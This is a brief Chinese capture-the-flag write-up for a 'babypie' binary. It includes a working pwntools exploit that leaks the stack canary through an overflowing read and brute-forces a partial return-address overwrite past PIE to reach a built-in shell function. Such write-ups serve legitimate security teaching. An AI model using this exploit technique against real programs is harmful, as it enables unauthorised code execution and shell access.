明显的是缓冲区溢出呀,read函数可以多读

64位程序,开启了NX和PIE,且程序里有了system("/bin/sh")

目标:控制RIP到A3E函数即可~

首先,要处理canary的问题~然后,覆盖返回地址~

partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址

exp如下:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

while True:
    try:
        io = process("./babypie", timeout = 1)
        io.sendafter(":\n", "A" * (0x30 - 0x8 + 1))
        io.recvuntil("A" * (0x30 - 0x8 + 1))
        canary = '\0' + io.recvn(7)
        success("0x" + canary.encode("hex"))
        io.sendafter(":\n", "A" * (0x30 - 0x8) + canary + "B" * 8 + '\x3E\x0A')
        io.interactive()
    except Exception as e:
        io.close()
        print e

参考链接:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#partial-overwrite